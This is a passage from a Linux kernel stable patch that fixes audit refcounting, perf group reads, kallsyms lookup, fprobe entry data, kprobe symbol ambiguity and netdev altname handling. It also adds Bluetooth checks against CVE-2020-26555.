++			atomic_inc(&n->name->refcnt);
+ 			return n->name;
+ 		}
+ 	}
+@@ -2237,7 +2237,7 @@ void __audit_getname(struct filename *name)
+ 	n->name = name;
+ 	n->name_len = AUDIT_NAME_FULL;
+ 	name->aname = n;
+-	name->refcnt++;
++	atomic_inc(&name->refcnt);
+ }
+ 
+ static inline int audit_copy_fcaps(struct audit_names *name,
+@@ -2369,7 +2369,7 @@ out_alloc:
+ 		return;
+ 	if (name) {
+ 		n->name = name;
+-		name->refcnt++;
++		atomic_inc(&name->refcnt);
+ 	}
+ 
+ out:
+@@ -2496,7 +2496,7 @@ void __audit_inode_child(struct inode *parent,
+ 		if (found_parent) {
+ 			found_child->name = found_parent->name;
+ 			found_child->name_len = AUDIT_NAME_FULL;
+-			found_child->name->refcnt++;
++			atomic_inc(&found_child->name->refcnt);
+ 		}
+ 	}
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index db1065daabb62..2b8315a948a2c 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1962,6 +1962,7 @@ static void perf_group_attach(struct perf_event *event)
+ 
+ 	list_add_tail(&event->sibling_list, &group_leader->sibling_list);
+ 	group_leader->nr_siblings++;
++	group_leader->group_generation++;
+ 
+ 	perf_event__header_size(group_leader);
+ 
+@@ -2156,6 +2157,7 @@ static void perf_group_detach(struct perf_event *event)
+ 	if (leader != event) {
+ 		list_del_init(&event->sibling_list);
+ 		event->group_leader->nr_siblings--;
++		event->group_leader->group_generation++;
+ 		goto out;
+ 	}
+ 
+@@ -5279,7 +5281,7 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 					u64 read_format, u64 *values)
+ {
+ 	struct perf_event_context *ctx = leader->ctx;
+-	struct perf_event *sub;
++	struct perf_event *sub, *parent;
+ 	unsigned long flags;
+ 	int n = 1; /* skip @nr */
+ 	int ret;
+@@ -5289,6 +5291,33 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 		return ret;
+ 
+ 	raw_spin_lock_irqsave(&ctx->lock, flags);
++	/*
++	 * Verify the grouping between the parent and child (inherited)
++	 * events is still in tact.
++	 *
++	 * Specifically:
++	 *  - leader->ctx->lock pins leader->sibling_list
++	 *  - parent->child_mutex pins parent->child_list
++	 *  - parent->ctx->mutex pins parent->sibling_list
++	 *
++	 * Because parent->ctx != leader->ctx (and child_list nests inside
++	 * ctx->mutex), group destruction is not atomic between children, also
++	 * see perf_event_release_kernel(). Additionally, parent can grow the
++	 * group.
++	 *
++	 * Therefore it is possible to have parent and child groups in a
++	 * different configuration and summing over such a beast makes no sense
++	 * what so ever.
++	 *
++	 * Reject this.
++	 */
++	parent = leader->parent;
++	if (parent &&
++	    (parent->group_generation != leader->group_generation ||
++	     parent->nr_siblings != leader->nr_siblings)) {
++		ret = -ECHILD;
++		goto unlock;
++	}
+ 
+ 	/*
+ 	 * Since we co-schedule groups, {enabled,running} times of siblings
+@@ -5322,8 +5351,9 @@ static int __perf_read_group_add(struct perf_event *leader,
+ 			values[n++] = atomic64_read(&sub->lost_samples);
+ 	}
+ 
++unlock:
+ 	raw_spin_unlock_irqrestore(&ctx->lock, flags);
+-	return 0;
++	return ret;
+ }
+ 
+ static int perf_read_group(struct perf_event *event,
+@@ -5342,10 +5372,6 @@ static int perf_read_group(struct perf_event *event,
+ 
+ 	values[0] = 1 + leader->nr_siblings;
+ 
+-	/*
+-	 * By locking the child_mutex of the leader we effectively
+-	 * lock the child list of all siblings.. XXX explain how.
+-	 */
+ 	mutex_lock(&leader->child_mutex);
+ 
+ 	ret = __perf_read_group_add(leader, read_format, values);
+@@ -13267,6 +13293,7 @@ static int inherit_group(struct perf_event *parent_event,
+ 		    !perf_get_aux_event(child_ctr, leader))
+ 			return -EINVAL;
+ 	}
++	leader->group_generation = parent_event->group_generation;
+ 	return 0;
+ }
+ 
+diff --git a/kernel/kallsyms.c b/kernel/kallsyms.c
+index ad3cccb0970f8..824bcc7b5dbc3 100644
+--- a/kernel/kallsyms.c
++++ b/kernel/kallsyms.c
+@@ -197,6 +197,16 @@ static int compare_symbol_name(const char *name, char *namebuf)
+ 	return strcmp(name, namebuf);
+ }
+ 
++static unsigned int get_symbol_seq(int index)
++{
++	unsigned int i, seq = 0;
++
++	for (i = 0; i < 3; i++)
++		seq = (seq << 8) | kallsyms_seqs_of_names[3 * index + i];
++
++	return seq;
++}
++
+ static int kallsyms_lookup_names(const char *name,
+ 				 unsigned int *start,
+ 				 unsigned int *end)
+@@ -211,7 +221,7 @@ static int kallsyms_lookup_names(const char *name,
+ 
+ 	while (low <= high) {
+ 		mid = low + (high - low) / 2;
+-		seq = kallsyms_seqs_of_names[mid];
++		seq = get_symbol_seq(mid);
+ 		off = get_symbol_offset(seq);
+ 		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 		ret = compare_symbol_name(name, namebuf);
+@@ -228,7 +238,7 @@ static int kallsyms_lookup_names(const char *name,
+ 
+ 	low = mid;
+ 	while (low) {
+-		seq = kallsyms_seqs_of_names[low - 1];
++		seq = get_symbol_seq(low - 1);
+ 		off = get_symbol_offset(seq);
+ 		kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 		if (compare_symbol_name(name, namebuf))
+@@ -240,7 +250,7 @@ static int kallsyms_lookup_names(const char *name,
+ 	if (end) {
+ 		high = mid;
+ 		while (high < kallsyms_num_syms - 1) {
+-			seq = kallsyms_seqs_of_names[high + 1];
++			seq = get_symbol_seq(high + 1);
+ 			off = get_symbol_offset(seq);
+ 			kallsyms_expand_symbol(off, namebuf, ARRAY_SIZE(namebuf));
+ 			if (compare_symbol_name(name, namebuf))
+@@ -265,7 +275,7 @@ unsigned long kallsyms_lookup_name(const char *name)
+ 
+ 	ret = kallsyms_lookup_names(name, &i, NULL);
+ 	if (!ret)
+-		return kallsyms_sym_address(kallsyms_seqs_of_names[i]);
++		return kallsyms_sym_address(get_symbol_seq(i));
+ 
+ 	return module_kallsyms_lookup_name(name);
+ }
+@@ -293,6 +303,24 @@ int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct module *,
+ 	return 0;
+ }
+ 
++int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++				  const char *name, void *data)
++{
++	int ret;
++	unsigned int i, start, end;
++
++	ret = kallsyms_lookup_names(name, &start, &end);
++	if (ret)
++		return 0;
++
++	for (i = start; !ret && i <= end; i++) {
++		ret = fn(data, kallsyms_sym_address(get_symbol_seq(i)));
++		cond_resched();
++	}
++
++	return ret;
++}
++
+ static unsigned long get_symbol_pos(unsigned long addr,
+ 				    unsigned long *symbolsize,
+ 				    unsigned long *offset)
+diff --git a/kernel/kallsyms_internal.h b/kernel/kallsyms_internal.h
+index a04b7a5cb1e3e..27fabdcc40f57 100644
+--- a/kernel/kallsyms_internal.h
++++ b/kernel/kallsyms_internal.h
+@@ -26,6 +26,6 @@ extern const char kallsyms_token_table[] __weak;
+ extern const u16 kallsyms_token_index[] __weak;
+ 
+ extern const unsigned int kallsyms_markers[] __weak;
+-extern const unsigned int kallsyms_seqs_of_names[] __weak;
++extern const u8 kallsyms_seqs_of_names[] __weak;
+ 
+ #endif // LINUX_KALLSYMS_INTERNAL_H_
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c11..853a07618a3cf 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -345,7 +345,8 @@ static void sugov_update_single_freq(struct update_util_data *hook, u64 time,
+ 	 * Except when the rq is capped by uclamp_max.
+ 	 */
+ 	if (!uclamp_rq_is_capped(cpu_rq(sg_cpu->cpu)) &&
+-	    sugov_cpu_is_busy(sg_cpu) && next_f < sg_policy->next_freq) {
++	    sugov_cpu_is_busy(sg_cpu) && next_f < sg_policy->next_freq &&
++	    !sg_policy->need_freq_update) {
+ 		next_f = sg_policy->next_freq;
+ 
+ 		/* Restore cached freq as next_freq has changed */
+diff --git a/kernel/trace/bpf_trace.c b/kernel/trace/bpf_trace.c
+index 8c77c54e6348b..f4a494a457c52 100644
+--- a/kernel/trace/bpf_trace.c
++++ b/kernel/trace/bpf_trace.c
+@@ -2646,7 +2646,7 @@ kprobe_multi_link_prog_run(struct bpf_kprobe_multi_link *link,
+ 
+ static void
+ kprobe_multi_link_handler(struct fprobe *fp, unsigned long fentry_ip,
+-			  struct pt_regs *regs)
++			  struct pt_regs *regs, void *data)
+ {
+ 	struct bpf_kprobe_multi_link *link;
+ 
+diff --git a/kernel/trace/fprobe.c b/kernel/trace/fprobe.c
+index 1322247ce6488..f386d6bd8e0e3 100644
+--- a/kernel/trace/fprobe.c
++++ b/kernel/trace/fprobe.c
+@@ -17,14 +17,16 @@
+ struct fprobe_rethook_node {
+ 	struct rethook_node node;
+ 	unsigned long entry_ip;
++	char data[];
+ };
+ 
+ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 			   struct ftrace_ops *ops, struct ftrace_regs *fregs)
+ {
+ 	struct fprobe_rethook_node *fpr;
+-	struct rethook_node *rh;
++	struct rethook_node *rh = NULL;
+ 	struct fprobe *fp;
++	void *entry_data = NULL;
+ 	int bit;
+ 
+ 	fp = container_of(ops, struct fprobe, ops);
+@@ -37,9 +39,6 @@ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 		return;
+ 	}
+ 
+-	if (fp->entry_handler)
+-		fp->entry_handler(fp, ip, ftrace_get_regs(fregs));
+-
+ 	if (fp->exit_handler) {
+ 		rh = rethook_try_get(fp->rethook);
+ 		if (!rh) {
+@@ -48,9 +47,16 @@ static void fprobe_handler(unsigned long ip, unsigned long parent_ip,
+ 		}
+ 		fpr = container_of(rh, struct fprobe_rethook_node, node);
+ 		fpr->entry_ip = ip;
+-		rethook_hook(rh, ftrace_get_regs(fregs), true);
++		if (fp->entry_data_size)
++			entry_data = fpr->data;
+ 	}
+ 
++	if (fp->entry_handler)
++		fp->entry_handler(fp, ip, ftrace_get_regs(fregs), entry_data);
++
++	if (rh)
++		rethook_hook(rh, ftrace_get_regs(fregs), true);
++
+ out:
+ 	ftrace_test_recursion_unlock(bit);
+ }
+@@ -81,7 +87,8 @@ static void fprobe_exit_handler(struct rethook_node *rh, void *data,
+ 
+ 	fpr = container_of(rh, struct fprobe_rethook_node, node);
+ 
+-	fp->exit_handler(fp, fpr->entry_ip, regs);
++	fp->exit_handler(fp, fpr->entry_ip, regs,
++			 fp->entry_data_size ? (void *)fpr->data : NULL);
+ }
+ NOKPROBE_SYMBOL(fprobe_exit_handler);
+ 
+@@ -127,7 +134,7 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ {
+ 	int i, size;
+ 
+-	if (num < 0)
++	if (num <= 0)
+ 		return -EINVAL;
+ 
+ 	if (!fp->exit_handler) {
+@@ -136,9 +143,12 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ 	}
+ 
+ 	/* Initialize rethook if needed */
+-	size = num * num_possible_cpus() * 2;
+-	if (size < 0)
+-		return -E2BIG;
++	if (fp->nr_maxactive)
++		size = fp->nr_maxactive;
++	else
++		size = num * num_possible_cpus() * 2;
++	if (size <= 0)
++		return -EINVAL;
+ 
+ 	fp->rethook = rethook_alloc((void *)fp, fprobe_exit_handler);
+ 	if (!fp->rethook)
+@@ -146,7 +156,7 @@ static int fprobe_init_rethook(struct fprobe *fp, int num)
+ 	for (i = 0; i < size; i++) {
+ 		struct fprobe_rethook_node *node;
+ 
+-		node = kzalloc(sizeof(*node), GFP_KERNEL);
++		node = kzalloc(sizeof(*node) + fp->entry_data_size, GFP_KERNEL);
+ 		if (!node) {
+ 			rethook_free(fp->rethook);
+ 			fp->rethook = NULL;
+diff --git a/kernel/trace/trace_events.c b/kernel/trace/trace_events.c
+index 9da418442a063..2e3dce5e2575e 100644
+--- a/kernel/trace/trace_events.c
++++ b/kernel/trace/trace_events.c
+@@ -2777,6 +2777,7 @@ void trace_event_eval_update(struct trace_eval_map **map, int len)
+ 				update_event_fields(call, map[i]);
+ 			}
+ 		}
++		cond_resched();
+ 	}
+ 	up_write(&trace_event_sem);
+ }
+diff --git a/kernel/trace/trace_kprobe.c b/kernel/trace/trace_kprobe.c
+index 5a75b039e5860..22852029c6924 100644
+--- a/kernel/trace/trace_kprobe.c
++++ b/kernel/trace/trace_kprobe.c
+@@ -705,6 +705,25 @@ static struct notifier_block trace_kprobe_module_nb = {
+ 	.priority = 1	/* Invoked after kprobe module callback */
+ };
+ 
++static int count_symbols(void *data, unsigned long unused)
++{
++	unsigned int *count = data;
++
++	(*count)++;
++
++	return 0;
++}
++
++static unsigned int number_of_same_symbols(char *func_name)
++{
++	unsigned int count;
++
++	count = 0;
++	kallsyms_on_each_match_symbol(count_symbols, func_name, &count);
++
++	return count;
++}
++
+ static int __trace_kprobe_create(int argc, const char *argv[])
+ {
+ 	/*
+@@ -834,6 +853,31 @@ static int __trace_kprobe_create(int argc, const char *argv[])
+ 		}
+ 	}
+ 
++	if (symbol && !strchr(symbol, ':')) {
++		unsigned int count;
++
++		count = number_of_same_symbols(symbol);
++		if (count > 1) {
++			/*
++			 * Users should use ADDR to remove the ambiguity of
++			 * using KSYM only.
++			 */
++			trace_probe_log_err(0, NON_UNIQ_SYMBOL);
++			ret = -EADDRNOTAVAIL;
++
++			goto error;
++		} else if (count == 0) {
++			/*
++			 * We can return ENOENT earlier than when register the
++			 * kprobe.
++			 */
++			trace_probe_log_err(0, BAD_PROBE_ADDR);
++			ret = -ENOENT;
++
++			goto error;
++		}
++	}
++
+ 	trace_probe_log_set_index(0);
+ 	if (event) {
+ 		ret = traceprobe_parse_event_name(&event, &group, gbuf,
+@@ -1744,6 +1788,7 @@ static int unregister_kprobe_event(struct trace_kprobe *tk)
+ }
+ 
+ #ifdef CONFIG_PERF_EVENTS
++
+ /* create a trace_kprobe, but don't add it to global lists */
+ struct trace_event_call *
+ create_local_trace_kprobe(char *func, void *addr, unsigned long offs,
+@@ -1754,6 +1799,24 @@ create_local_trace_kprobe(char *func, void *addr, unsigned long offs,
+ 	int ret;
+ 	char *event;
+ 
++	if (func) {
++		unsigned int count;
++
++		count = number_of_same_symbols(func);
++		if (count > 1)
++			/*
++			 * Users should use addr to remove the ambiguity of
++			 * using func only.
++			 */
++			return ERR_PTR(-EADDRNOTAVAIL);
++		else if (count == 0)
++			/*
++			 * We can return ENOENT earlier than when register the
++			 * kprobe.
++			 */
++			return ERR_PTR(-ENOENT);
++	}
++
+ 	/*
+ 	 * local trace_kprobes are not added to dyn_event, so they are never
+ 	 * searched in find_trace_kprobe(). Therefore, there is no concern of
+diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
+index f41c330bd60f1..f48b3ed20b095 100644
+--- a/kernel/trace/trace_probe.h
++++ b/kernel/trace/trace_probe.h
+@@ -404,6 +404,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
+ 	C(BAD_MAXACT,		"Invalid maxactive number"),		\
+ 	C(MAXACT_TOO_BIG,	"Maxactive is too big"),		\
+ 	C(BAD_PROBE_ADDR,	"Invalid probed address or symbol"),	\
++	C(NON_UNIQ_SYMBOL,	"The symbol is not unique"),		\
+ 	C(BAD_RETPROBE,		"Retprobe address must be an function entry"), \
+ 	C(BAD_ADDR_SUFFIX,	"Invalid probed address suffix"), \
+ 	C(NO_GROUP_NAME,	"Group name is not specified"),		\
+diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
+index 12dfe6691dd52..4db0199651f56 100644
+--- a/lib/Kconfig.debug
++++ b/lib/Kconfig.debug
+@@ -1219,13 +1219,16 @@ config DEBUG_TIMEKEEPING
+ config DEBUG_PREEMPT
+ 	bool "Debug preemptible kernel"
+ 	depends on DEBUG_KERNEL && PREEMPTION && TRACE_IRQFLAGS_SUPPORT
+-	default y
+ 	help
+ 	  If you say Y here then the kernel will use a debug variant of the
+ 	  commonly used smp_processor_id() function and will print warnings
+ 	  if kernel code uses it in a preemption-unsafe way. Also, the kernel
+ 	  will detect preemption count underflows.
+ 
++	  This option has potential to introduce high runtime overhead,
++	  depending on workload as it triggers debugging routines for each
++	  this_cpu operation. It should only be used for debugging purposes.
++
+ menu "Lock Debugging (spinlocks, mutexes, etc...)"
+ 
+ config LOCK_DEBUGGING_SUPPORT
+diff --git a/lib/test_fprobe.c b/lib/test_fprobe.c
+index e0381b3ec410c..34fa5a5bbda1f 100644
+--- a/lib/test_fprobe.c
++++ b/lib/test_fprobe.c
+@@ -30,7 +30,8 @@ static noinline u32 fprobe_selftest_target2(u32 value)
+ 	return (value / div_factor) + 1;
+ }
+ 
+-static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip,
++				     struct pt_regs *regs, void *data)
+ {
+ 	KUNIT_EXPECT_FALSE(current_test, preemptible());
+ 	/* This can be called on the fprobe_selftest_target and the fprobe_selftest_target2 */
+@@ -39,7 +40,8 @@ static notrace void fp_entry_handler(struct fprobe *fp, unsigned long ip, struct
+ 	entry_val = (rand1 / div_factor);
+ }
+ 
+-static notrace void fp_exit_handler(struct fprobe *fp, unsigned long ip, struct pt_regs *regs)
++static notrace void fp_exit_handler(struct fprobe *fp, unsigned long ip,
++				    struct pt_regs *regs, void *data)
+ {
+ 	unsigned long ret = regs_return_value(regs);
+ 
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index 61059571c8779..728be9307f526 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1583,6 +1583,15 @@ struct hci_conn *hci_connect_acl(struct hci_dev *hdev, bdaddr_t *dst,
+ 		return ERR_PTR(-EOPNOTSUPP);
+ 	}
+ 
++	/* Reject outgoing connection to device with same BD ADDR against
++	 * CVE-2020-26555
++	 */
++	if (!bacmp(&hdev->bdaddr, dst)) {
++		bt_dev_dbg(hdev, "Reject connection with same BD_ADDR %pMR\n",
++			   dst);
++		return ERR_PTR(-ECONNREFUSED);
++	}
++
+ 	acl = hci_conn_hash_lookup_ba(hdev, ACL_LINK, dst);
+ 	if (!acl) {
+ 		acl = hci_conn_add(hdev, ACL_LINK, dst, HCI_ROLE_MASTER);
+@@ -2355,34 +2364,41 @@ int hci_conn_security(struct hci_conn *conn, __u8 sec_level, __u8 auth_type,
+ 	if (!test_bit(HCI_CONN_AUTH, &conn->flags))
+ 		goto auth;
+ 
+-	/* An authenticated FIPS approved combination key has sufficient
+-	 * security for security level 4. */
+-	if (conn->key_type == HCI_LK_AUTH_COMBINATION_P256 &&
+-	    sec_level == BT_SECURITY_FIPS)
+-		goto encrypt;
+-
+-	/* An authenticated combination key has sufficient security for
+-	   security level 3. */
+-	if ((conn->key_type == HCI_LK_AUTH_COMBINATION_P192 ||
+-	     conn->key_type == HCI_LK_AUTH_COMBINATION_P256) &&
+-	    sec_level == BT_SECURITY_HIGH)
+-		goto encrypt;
+-
+-	/* An unauthenticated combination key has sufficient security for
+-	   security level 1 and 2. */
+-	if ((conn->key_type == HCI_LK_UNAUTH_COMBINATION_P192 ||
+-	     conn->key_type == HCI_LK_UNAUTH_COMBINATION_P256) &&
+-	    (sec_level == BT_SECURITY_MEDIUM || sec_level == BT_SECURITY_LOW))
+-		goto encrypt;
+-
+-	/* A combination key has always sufficient security for the security
+-	   levels 1 or 2. High security level requires the combination key
+-	   is generated using maximum PIN code length (16).
+-	   For pre 2.1 units. */
+-	if (conn->key_type == HCI_LK_COMBINATION &&
+-	    (sec_level == BT_SECURITY_MEDIUM || sec_level == BT_SECURITY_LOW ||
+-	     conn->pin_length == 16))
+-		goto encrypt;
++	switch (conn->key_type) {
++	case HCI_LK_AUTH_COMBINATION_P256:
++		/* An authenticated FIPS approved combination key has
++		 * sufficient security for security level 4 or lower.
++		 */
++		if (sec_level <= BT_SECURITY_FIPS)
++			goto encrypt;
++		break;
++	case HCI_LK_AUTH_COMBINATION_P192:
++		/* An authenticated combination key has sufficient security for
++		 * security level 3 or lower.
++		 */
++		if (sec_level <= BT_SECURITY_HIGH)
++			goto encrypt;
++		break;
++	case HCI_LK_UNAUTH_COMBINATION_P192:
++	case HCI_LK_UNAUTH_COMBINATION_P256:
++		/* An unauthenticated combination key has sufficient security
++		 * for security level 2 or lower.
++		 */
++		if (sec_level <= BT_SECURITY_MEDIUM)
++			goto encrypt;
++		break;
++	case HCI_LK_COMBINATION:
++		/* A combination key has always sufficient security for the
++		 * security levels 2 or lower. High security level requires the
++		 * combination key is generated using maximum PIN code length
++		 * (16). For pre 2.1 units.
++		 */
++		if (sec_level <= BT_SECURITY_MEDIUM || conn->pin_length == 16)
++			goto encrypt;
++		break;
++	default:
++		break;
++	}
+ 
+ auth:
+ 	if (test_bit(HCI_CONN_ENCRYPT_PEND, &conn->flags))
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d13b498f148cc..6a1db678d032f 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2616,7 +2616,11 @@ int hci_register_dev(struct hci_dev *hdev)
+ 	if (id < 0)
+ 		return id;
+ 
+-	snprintf(hdev->name, sizeof(hdev->name), "hci%d", id);
++	error = dev_set_name(&hdev->dev, "hci%u", id);
++	if (error)
++		return error;
++
++	hdev->name = dev_name(&hdev->dev);
+ 	hdev->id = id;
+ 
+ 	BT_DBG("%p name %s bus %d", hdev, hdev->name, hdev->bus);
+@@ -2638,8 +2642,6 @@ int hci_register_dev(struct hci_dev *hdev)
+ 	if (!IS_ERR_OR_NULL(bt_debugfs))
+ 		hdev->debugfs = debugfs_create_dir(hdev->name, bt_debugfs);
+ 
+-	dev_set_name(&hdev->dev, "%s", hdev->name);
+-
+ 	error = device_add(&hdev->dev);
+ 	if (error < 0)
+ 		goto err_wqueue;
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index e4d8857716eb7..c86a45344fe28 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -25,6 +25,8 @@
+ /* Bluetooth HCI event handling. */
+ 
+ #include <asm/unaligned.h>
++#include <linux/crypto.h>
++#include <crypto/algapi.h>
+ 
+ #include <net/bluetooth/bluetooth.h>
+ #include <net/bluetooth/hci_core.h>
+@@ -3277,6 +3279,16 @@ static void hci_conn_request_evt(struct hci_dev *hdev, void *data,
+ 
+ 	bt_dev_dbg(hdev, "bdaddr %pMR type 0x%x", &ev->bdaddr, ev->link_type);
+ 
++	/* Reject incoming connection from device with same BD ADDR against
++	 * CVE-2020-26555
++	 */
++	if (hdev && !bacmp(&hdev->bdaddr, &ev->bdaddr)) {
++		bt_dev_dbg(hdev, "Reject connection with same BD_ADDR %pMR\n",
++			   &ev->bdaddr);
++		hci_reject_conn(hdev, &ev->bdaddr);
++		return;
++	}
++
+ 	mask |= hci_proto_connect_ind(hdev, &ev->bdaddr, ev->link_type,
+ 				      &flags);
+ 
+@@ -4686,6 +4698,15 @@ static void hci_link_key_notify_evt(struct hci_dev *hdev, void *data,
+ 	if (!conn)
+ 		goto unlock;
+ 
++	/* Ignore NULL link key against CVE-2020-26555 */
++	if (!crypto_memneq(ev->link_key, ZERO_KEY, HCI_LINK_KEY_SIZE)) {
++		bt_dev_dbg(hdev, "Ignore NULL link key (ZERO KEY) for %pMR",
++			   &ev->bdaddr);
++		hci_disconnect(conn, HCI_ERROR_AUTH_FAILURE);
++		hci_conn_drop(conn);
++		goto unlock;
++	}
++
+ 	hci_conn_hold(conn);
+ 	conn->disc_timeout = HCI_DISCONN_TIMEOUT;
+ 	hci_conn_drop(conn);
+@@ -5221,8 +5242,8 @@ static u8 bredr_oob_data_present(struct hci_conn *conn)
+ 		 * available, then do not declare that OOB data is
+ 		 * present.
+ 		 */
+-		if (!memcmp(data->rand256, ZERO_KEY, 16) ||
+-		    !memcmp(data->hash256, ZERO_KEY, 16))
++		if (!crypto_memneq(data->rand256, ZERO_KEY, 16) ||
++		    !crypto_memneq(data->hash256, ZERO_KEY, 16))
+ 			return 0x00;
+ 
+ 		return 0x02;
+@@ -5232,8 +5253,8 @@ static u8 bredr_oob_data_present(struct hci_conn *conn)
+ 	 * not supported by the hardware, then check that if
+ 	 * P-192 data values are present.
+ 	 */
+-	if (!memcmp(data->rand192, ZERO_KEY, 16) ||
+-	    !memcmp(data->hash192, ZERO_KEY, 16))
++	if (!crypto_memneq(data->rand192, ZERO_KEY, 16) ||
++	    !crypto_memneq(data->hash192, ZERO_KEY, 16))
+ 		return 0x00;
+ 
+ 	return 0x01;
+@@ -5250,7 +5271,7 @@ static void hci_io_capa_request_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn)
++	if (!conn || !hci_conn_ssp_enabled(conn))
+ 		goto unlock;
+ 
+ 	hci_conn_hold(conn);
+@@ -5497,7 +5518,7 @@ static void hci_simple_pair_complete_evt(struct hci_dev *hdev, void *data,
+ 	hci_dev_lock(hdev);
+ 
+ 	conn = hci_conn_hash_lookup_ba(hdev, ACL_LINK, &ev->bdaddr);
+-	if (!conn)
++	if (!conn || !hci_conn_ssp_enabled(conn))
+ 		goto unlock;
+ 
+ 	/* Reset the authentication requirement to unknown */
+diff --git a/net/bluetooth/hci_sock.c b/net/bluetooth/hci_sock.c
+index 1d249d839819d..484fc2a8e4baa 100644
+--- a/net/bluetooth/hci_sock.c
++++ b/net/bluetooth/hci_sock.c
+@@ -439,7 +439,8 @@ static struct sk_buff *create_monitor_event(struct hci_dev *hdev, int event)
+ 		ni->type = hdev->dev_type;
+ 		ni->bus = hdev->bus;
+ 		bacpy(&ni->bdaddr, &hdev->bdaddr);
+-		memcpy(ni->name, hdev->name, 8);
++		memcpy_and_pad(ni->name, sizeof(ni->name), hdev->name,
++			       strnlen(hdev->name, sizeof(ni->name)), '\0');
+ 
+ 		opcode = cpu_to_le16(HCI_MON_NEW_INDEX);
+ 		break;
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 5374761f5af2c..0d5aa820fd830 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -345,7 +345,6 @@ int netdev_name_node_alt_create(struct net_device *dev, const char *name)
+ static void __netdev_name_node_alt_destroy(struct netdev_name_node *name_node)
+ {
+ 	list_del(&name_node->list);
+-	netdev_name_node_del(name_node);
+ 	kfree(name_node->name);
+ 	netdev_name_node_free(name_node);
+ }
+@@ -364,6 +363,8 @@ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name)
+ 	if (name_node == dev->name_node || name_node->dev != dev)
+ 		return -EINVAL;
+ 
++	netdev_name_node_del(name_node);
++	synchronize_rcu();
+ 	__netdev_name_node_alt_destroy(name_node);
+ 
+ 	return 0;
+@@ -380,6 +381,7 @@ static void netdev_name_node_alt_flush(struct net_device *dev)
+ /* Device list insertion */
+ static void list_netdevice(struct net_device *dev)
+ {
++	struct netdev_name_node *name_node;
+ 	struct net *net = dev_net(dev);
+ 
+ 	ASSERT_RTNL();
+@@ -391,6 +393,9 @@ static void list_netdevice(struct net_device *dev)
+ 			   dev_index_hash(net, dev->ifindex));
+ 	write_unlock(&dev_base_lock);
+ 
++	netdev_for_each_altname(dev, name_node)
++		netdev_name_node_add(net, name_node);
++
+ 	dev_base_seq_inc(net);
+ }
+ 
+@@ -399,8 +404,13 @@ static void list_netdevice(struct net_device *dev)
+  */
+ static void unlist_netdevice(struct net_device *dev, bool lock)
+ {
++	struct netdev_name_node *name_node;
++
+ 	ASSERT_RTNL();
+ 
++	netdev_for_each_altname(dev, name_node)
++		netdev_name_node_del(name_node);
++
+ 	/* Unlink dev from the device chain */
+ 	if (lock)
+ 		write_lock(&dev_base_lock);
+@@ -1053,7 +1063,8 @@ static int __dev_alloc_name(struct net *net, const char *name, char *buf)
+ 
+ 		for_each_netdev(net, d) {
+ 			struct netdev_name_node *name_node;
+-			list_for_each_entry(name_node, &d->name_node->list, list) {
++
++			netdev_for_each_altname(d, name_node) {
+ 				if (!sscanf(name_node->name, name, &i))
+ 					continue;
+ 				if (i < 0 || i >= max_netdevices)
+@@ -1090,6 +1101,26 @@ static int __dev_alloc_name(struct net *net, const char *name, char *buf)
+ 	return -ENFILE;
+ }
+ 
++static int dev_prep_valid_name(struct net *net, struct net_device *dev,
++			       const char *want_name, char *out_name)
++{
++	int ret;
++
++	if (!dev_valid_name(want_name))
++		return -EINVAL;
++
++	if (strchr(want_name, '%')) {
++		ret = __dev_alloc_name(net, want_name, out_name);
++		return ret < 0 ? ret : 0;
++	} else if (netdev_name_in_use(net, want_name)) {
++		return -EEXIST;
++	} else if (out_name != want_name) {
++		strscpy(out_name, want_name, IFNAMSIZ);
++	}
++
++	return 0;
++}
++
+ static int dev_alloc_name_ns(struct net *net,
+ 			     struct net_device *dev,
+ 			     const char *name)
+@@ -1127,19 +1158,13 @@ EXPORT_SYMBOL(dev_alloc_name);
+ static int dev_get_valid_name(struct net *net, struct net_device *dev,
+ 			      const char *name)
+ {
+-	BUG_ON(!net);
+-
+-	if (!dev_valid_name(name))
+-		return -EINVAL;
+-
+-	if (strchr(name, '%'))
+-		return dev_alloc_name_ns(net, dev, name);
+-	else if (netdev_name_in_use(net, name))
+-		return -EEXIST;
+-	else if (dev->name != name)
+-		strscpy(dev->name, name, IFNAMSIZ);
++	char buf[IFNAMSIZ];
++	int ret;
+ 
+-	return 0;
++	ret = dev_prep_valid_name(net, dev, name, buf);
++	if (ret >= 0)
++		strscpy(dev->name, buf, IFNAMSIZ);
++	return ret;
+ }
+ 
+ /**
